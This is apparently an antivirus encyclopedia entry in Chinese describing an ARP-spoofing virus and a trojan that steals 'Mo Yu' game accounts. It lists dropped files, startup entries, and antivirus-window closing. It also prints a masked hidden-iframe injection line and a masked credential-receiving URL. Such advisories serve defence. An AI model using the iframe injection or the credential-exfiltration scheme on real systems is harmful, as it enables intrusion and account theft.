“魔域盜號者53248”(Win32.Troj.OnlineGames.ds.53248)威脅級別:★
病毒特徵:病毒運行後分別在兩個資料夾下生成病毒檔案,並寫註冊表增加啟動項以達到病毒開機自啟動。病毒會安裝信息鉤子。修改註冊表禁用系統自動更新功能。病毒會盜取網路遊戲《魔域》的帳號信息並傳送到木馬種植者指定的接收地址。
基本介紹
- 中文名:魔域盜號者53248
- 隸屬:?>病毒
- 遊戲:魔域
- 隸屬:ARP病毒
特點,建議,
特點
"ARP欺騙196608"(Win32.Hack.Delf.196608)這是一個ARP病毒。只要中了該病毒,在區域網路內的機器打開瀏覽器瀏覽網頁時,毒霸會一直報病毒。該病毒利用傳送數據包時嵌入帶病毒的HTML代碼,訪問惡意網址下載惡意病毒。
一、 "ARP欺騙196608"(Win32.Hack.Delf.196608) 威脅級別:★★
1.病毒運行後,會生成以下病毒檔案
%Systemroot%system32\Packet.dll
%Systemroot%system32\wpcap.dll
%Systemroot%system32\WanPacket.dll
%Systemroot%system32\Drivers\npf.sys
2.病毒會添加啟動項(啟動項是指隨著系統的啟動而運行)
啟動項名:KVP 對應路徑:%WINDOWS%\system32\drivers\svchost.exe
3.HTML代碼為(通過在網頁添加iframe代碼,訪問所指向的網址,從該網下載惡意軟體):
<iframe src='h**p://www.z****0. com/0.htm' width=0 height=0></iframe>
二、"魔域盜號者53248"(Win32.Troj.OnlineGames.ds.53248)
威脅級別:★
1.病毒運行後,生成以下病毒檔案
%windir%\DiskMan32.exe
%windir%\system32\DiskMan32.dll
2.病毒會添加啟動項(啟動項是指隨著系統啟動而運行的項)
啟動項名:DiskMan32 對應路徑:%windir%\DiskMan32.exe
3.病毒運行後,會使系統的自動更新失效,導致用戶系統不能打全補丁以及獲得最新的系統信息。
4.病毒會創建執行緒監視"卡巴"和"瑞星"的警告視窗,當監測到有警告視窗則關閉。
5.病毒會通過讀取記憶體的方式盜走用戶的"魔域"帳號信息。
6.病毒指定的接收地址:
hxxp://www.xianyu***.c om/my***/shou.asp?a=**&s=**&u=**&p=**&i=**&c=**
建議
1.最好安裝專業的防毒軟體進行全面監控。建議用戶安裝反病毒軟體防止日益增多的病毒,用戶在安裝反病毒軟體之後,應該經常進行升級、將一些主要監控經常打開(如郵件監控)、記憶體監控等,遇到問題要上報, 這樣才能真正保障計算機的安全。
